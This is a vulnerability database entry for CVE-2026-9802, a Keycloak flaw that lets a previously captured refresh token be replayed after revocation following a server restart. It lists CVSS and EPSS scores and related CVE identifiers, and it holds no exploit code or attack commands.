CVE-2026-9802EPSS p19.9%

CVE-2026-9802CVE-2026-9802

redhat / build_of_keycloak

Description

A flaw was found in Keycloak. When revokeRefreshToken=true is enabled and persistent session storage is in use, a server restart can reset internal timing mechanisms. This allows a remote attacker, who has previously captured a user's refresh token, to replay that token even after it has been revoked. Successful exploitation grants the attacker unauthorized access to the victim's account, potentially leading to information disclosure or privilege escalation.

Scoring

CVSS 6.8 ()
VectorCVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
EPSS0.28% probability of exploitation · percentile 19.9% · 2026-06-19T12:03:05Z
Last modified2026-06-10

Related by meaning· 6

Nearest entities by semantic similarity across the cs-graph corpus.

CVE
CVE-2026-8922
CVE
CVE-2026-7571
CVE
CVE-2026-7507
CVE
CVE-2026-4874
CVE
CVE-2026-9798
CVE
CVE-2026-9796
Sourced from NVD + FIRST.org EPSS. Curated for EU compliance use cases by Adam Lundqvist, Founder at SQUR.